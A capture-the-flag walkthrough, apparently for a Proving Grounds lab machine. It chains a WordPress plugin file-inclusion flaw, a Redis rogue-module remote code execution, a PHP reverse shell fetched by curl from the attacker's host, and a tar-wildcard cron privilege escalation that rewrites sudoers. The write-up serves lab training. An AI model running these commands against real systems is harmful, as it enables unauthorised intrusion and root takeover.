The initial foothold takes some time to get, look for vulnerable plugin that helps you read some file that contains sensitive info. Privilege escalation is something that executes frequently.
Enumeration
nmap -p- $ip -Pn -sT -v -A --open -T 4 -oN nmap.txtPort 22, 80 and 6379 open.
Port 80
Running http server, browse the website.
Let use wpscan and dirb to look for admin login page.
wpscan --url http://192.168.243.166
dirb http://192.168.243.166/ -o dirb.txtWordpress Result
From wpscan result, we discover plugin site-editor version 1.1.1. Even though is latest version, no harm in searching for any potential exploit. By googling “site editor wordpress exploit”, we found potential local file inclusion exploit.
We try to browse http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
To find the web root directory for us to further enumerate, we try to read /etc/apache2/sites-enabled/000-default.conf
curl http://192.168.243.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/apache2/sites-enabled/000-default.confWe discover the web root at /var/www/html. Tried to read wp-config.php but does not seem to work. Can’t read /etc/shadow as well.
After checking dirb result, we discover a bunch of directory listings(does not seem to have useful info here) and wp-admin login page, but at the moment we don’t have any credentials. I am wondering if we can get any useful info by reading local file.
Port 6379
A redis server, by google “Redis exploit” , we found a RCE exploit.
The exp.so is a malicious redis module which we going to load on the target redis server. You can get the exp.so here https://github.com/n0b0dyCN/redis-rogue-server/blob/master/exp.so
Download the exploit and module and execute the exploit, it requires authentication. This means we need a password.
Looking for redis config
By checking hacktrick , we found that redis password store at redis.conf. As we not familar with redis, we google for redis.conf common location in linux, and we found this. The common location at /etc/redis/redis.conf , let’s try our luck if we able to read the config file via LFI. We browse (Or you can use curl to better reading the result).
curl http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/redis/redis.confWe discovered the password in security part in the config file.
Try again on the Redis exploit with password
python3 redis-rce.py -r $IP -p 6379 -L $KaliIP -P 80 -v -f redis-rogue-server/exp.so -a "ThePassword"
If you choose reverse shell, ONLY setup the netcat listener after you select r option and it request you to enter the IP.
Reverse shell gain, but no flag yet
We discover alice in home directory. Checking local port netstat -tulnp we found 3306 port open, high chance a database. Check on the /var/www/html/wp-config.php we found the database credential.
mysql -h 127.0.0.1 -u karl -pLogged in to the database, look around, found wp-admin hash and session token. Try to crack the hash does not seem to work as it took super long and no result. The session token does not seem usable to me. Decide to move on from database as it could rabbit hole.
Getting closer
Check ps -aux, we notice apache run by alice, which means if we can get a reverse shell php to works on the wordpress site, we have a chance to gain a reverse shell alice, when I check on the permission on /var/www/html , we do not have write permission.
#look for writable directory
find / -type d -maxdepth 5 -writable 2>/dev/null
Testing if .php gets executed
At first, I create a simple php file at /tmp, just echo “<?php phpinfo() ?>” > test.php, then I browse it via the LFI vulnerability earlier. http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/tmp/test.php
It fails, the php page does not get loaded. Then I copy to /run/redis and try to load it again. http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/run/redis/test.php
It works! Now we just upload the reverse php file to the directory and load it and we should gain a new reverse shell hopefully alice. You can get the php reverse shell here, remember to change the port and IP.
#At kali machine
python3 -m http.server 80
nc -nlvp 8081
#At target machine
curl http://$kaliIP/webshell.php -o /run/redis/shell.php
#then browse the LFI page, browser or curl is fine.
curl http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/run/redis/shell.php
Privilege Escalation
While checking cronjob cat /etc/crontab, we found a cron job run as root to zip * file via tar.
By googling “sudo tar privilege escalation”, we found a medium article from Ben Folland that showed a guide on how we can get root with tar and *. Also, GTFObin has a similar guide as well.
An explanation of how the payload works can be found here. (Scroll to privilege escalation part)
#at target machine
echo "" > '--checkpoint=1'
echo "" > '--checkpoint-action=exec=sh payload.sh'
#then create a payload.sh with below content, you can create on your kali machine and transfer to target machine.
echo 'alice ALL=(root) NOPASSWD: ALL' > /etc/sudoers
chmod +x payload.sh
#wait for the cronjob to run, like a min, then try
sudo -l
sudo /bin/bash
#Root reverse shell gained. 
Congratz !! Hope you learn something from this walkthrough. Check out my stories for other proving grounds machine walkthroughs. Leave a comment if you found another way to pawn this machine.